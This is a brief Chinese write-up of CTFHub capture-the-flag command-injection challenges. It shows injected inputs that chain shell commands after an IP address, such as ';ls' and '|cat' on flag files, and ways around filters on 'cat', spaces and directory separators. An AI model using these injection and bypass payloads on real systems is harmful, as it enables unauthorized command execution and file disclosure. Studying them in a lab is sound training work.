ctfhub rce 命令注入 过滤cat 过滤空格 过滤目录分隔符
命令注入
源码直接给了出来尝试127.0.0.1;ls
发现一串数字的php文件cat查看
127.0.0.1|cat 233382768628619.php
查看源码发现flag
过滤cat
这题和上一题差不多只不过把cat给过滤掉了,过滤了cat我们可以用一下几种方法绕过
tac 从最后一行倒序显示内容,并将所有内容输出
more 根据窗口大小,一页一页的现实文件内容
less 和more类似,但其优点可以往前翻页,而且进行可以搜索字符
head 只显示头几行
tail 只显示最后几行
nl 类似于cat -n,显示时输出行号
tailf 类似于tail -f
使用127.0.0.1|tail (flag文件名)
查看源码发现flag
过滤空格
源码直接给了出来发现把空格给过滤了
使用127.0.0.1|ls
查看flag
127.0.0.1|cat<flag_7294130653.php
过滤目录分隔符
源码将\过滤掉了
使用127.0.0.1|ls
127.0.0.1;cd flag_is_here;ls
然后直接cat得出flag
127.0.0.1;cd flag_is_here;cat flag_30272158003930.php
得出flag
还有部分晚点再发今天就暂时分享这么多